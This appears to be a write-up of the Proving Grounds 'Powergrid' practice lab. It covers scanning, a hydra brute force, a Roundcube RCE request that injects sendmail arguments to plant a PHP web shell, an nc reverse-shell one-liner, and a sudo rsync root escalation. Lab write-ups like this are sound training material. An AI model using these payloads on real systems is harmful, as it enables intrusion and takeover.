OSCP-PG-Powergrid

Mkd1R 2022-5-27 95 5/27

#Enumeration

-nmap

# nmap -sS -Pn -open -T4 -p- 192.168.226.81
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-26 19:54 CST
Nmap scan report for 192.168.226.81
Host is up (0.31s latency).
Not shown: 64820 closed tcp ports (reset), 712 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
80/tcp  open  http
143/tcp open  imap
993/tcp open  imaps

-nmap2

# nmap -p80,143,993 -A 192.168.226.81     
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-26 19:55 CST
Nmap scan report for 192.168.226.81
Host is up (0.29s latency).

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: PowerGrid - Turning your lights off unless you pay.
|_http-server-header: Apache/2.4.38 (Debian)
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: more have LOGIN-REFERRALS capabilities listed ENABLE LITERAL+ Pre-login post-login OK ID IDLE STARTTLS SASL-IR LOGINDISABLEDA0001 IMAP4rev1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=powergrid
| Subject Alternative Name: DNS:powergrid
| Not valid before: 2020-05-19T16:49:55
|_Not valid after:  2030-05-17T16:49:55
993/tcp open  ssl/imap Dovecot imapd
|_imap-capabilities: more LOGIN-REFERRALS have AUTH=PLAINA0001 ENABLE LITERAL+ Pre-login post-login capabilities ID OK listed SASL-IR IDLE IMAP4rev1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=powergrid
| Subject Alternative Name: DNS:powergrid
| Not valid before: 2020-05-19T16:49:55
|_Not valid after:  2030-05-17T16:49:55
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: VoIP adapter|general purpose
Running: Cisco embedded, Linux 2.6.X
OS CPE: cpe:/h:cisco:unified_call_manager cpe:/o:linux:linux_kernel:2.6.26
OS details: Cisco Unified Communications Manager VoIP adapter, Linux 2.6.26 (PCLinuxOS)
Network Distance: 2 hops

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   306.30 ms 192.168.49.1
2   306.51 ms 192.168.226.81

 

#Web Enumeration

-Gobuster

# gobuster dir -u http://192.168.226.81 -t 50 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,json -o gbig2.txt
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.226.81/images/]
/index.php            (Status: 200) [Size: 3646]                                   
/server-status        (Status: 403) [Size: 279]                                    
/zmail                (Status: 401) [Size: 461]
访问80主页面(http://192.168.226.81/),在页面的最后有三个用户名需要留意,deez1,p48,all2,
一个图片页面,一个401认证界面,其他就没有东西了,最后我决定使用这几个用户名和kali自带的rockyou字典对401界面进行爆破
GET /zmail HTTP/1.1
Host: 192.168.226.81
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic ZGVlejE6MTIzNDU2

数据包如上图所示Authorization使用的base64,解码发现中间用:隔开,我将使用hydra去爆破,并且成功爆破出来p48用户的密码
hydra -l p48 -P /usr/share/wordlists/rockyou.txt -f 192.168.81.81 http-get /zmail

 

在我登录之后又出现一个登陆界面,但是使用相同的账号与密码即可登录成功,进入之后,有一封root用户发的邮件,内容还包括一段话和一个PGP-Encrypted Message,另外我注意到了他的版本

#Exploitation

这个版本存在一个RCE漏洞,我尝试这利用一下,并且成功了(https://www.exploit-db.com/exploits/40892)我修改了data中_from参数以及_subject参数来写入一个phpinfo进行测试
POST /zmail/?_task=mail&_unlock=loading1653637099991&_lang=en_US&_framed=1 HTTP/1.1

Host: 192.168.81.81

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 290

Origin: http://192.168.81.81

Authorization: Basic cDQ4OmVsZWN0cmljbw==

Connection: close

Referer: http://192.168.81.81/zmail/?_task=mail&_action=compose&_id=52809309962907fc534c57

Cookie: roundcube_sessid=jl61m9rr76vhcom7i67e0fsesv; language=en_US; roundcube_sessauth=Nhw4V30Gi3mwgG8Egub4BTaiHs-1653636900

Upgrade-Insecure-Requests: 1



_token=zrRqGx8U8KZrxDePgF6KPCjgv3pQWKuN&_task=mail&_action=send&_id=52809309962907fc534c57&_attachments=&_from=example@example.com -OQueueDirectory=/tmp -X/var/www/html/shell2.php&_to=test%40test.com&_cc=&_bcc=&_replyto=&_followupto=&_subject=<?php system($_REQUEST['a']);?>&editorSelector=plain&_priority=0&_store_target=Sent&_draft_saveid=&_draft=&_is_html=0&_framed=1&_message=test
测试成功之后我尝试反弹了一个shell,我在本地2222端口进行监听
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.81 2222 >/tmp/f
进行了URL编码
%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%39%32%2e%31%36%38%2e%34%39%2e%38%31%20%32%32%32%32%20%3e%2f%74%6d%70%2f%66
随后成功反弹回了shell
我拿到www-data权限之后我使用su切换到了p48用户,使用的密码还是之前爆出来的electrico,并且在家目录还发现了一个privkey.gpg文件,加上之前的PGP-Encrypted Message可以进行解密,并且利用electrico当做密码,解密出来是一个ssh私钥,但是本身并没有开放22端口,于是我又回去仔细看了一遍提示说让我扫描IP并使用下面加密的SSH秘钥
我使用ip a命令查看到有一个docker0网卡,于是我扫描存活IP有哪些
for i in {1..254} ; do ping -c 1 172.17.0.$i -W 1 &>/dev/null && echo 172.17.0.$i is alive || echo 192.168.110.$i is down ;done
<.0.$i is alive || echo 192.168.110.$i is down ;done
发现172.16.0.2是存活的,于是我使用之前发现的三个用户分别进行尝试,最后发现p48可以成功登陆
我首先使用sudo -l查看当前用户拥有哪些权限,发现可以NOPASS使用rsync,于是我查询有关rsync的提权方式,并成功提权
sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
我以为我已经拿到了最高权限,但是我并没有寻找到proof.txt文件,值看到了flag3.txt它提示我向后转,于是我又尝试ssh连接回172.17.0.1,并且这次我成功找到了proof.txt文件
- THE END -

Mkd1R

7月02日21:58

最后修改:2022年7月2日
0

非特殊说明,本博所有文章均为博主原创。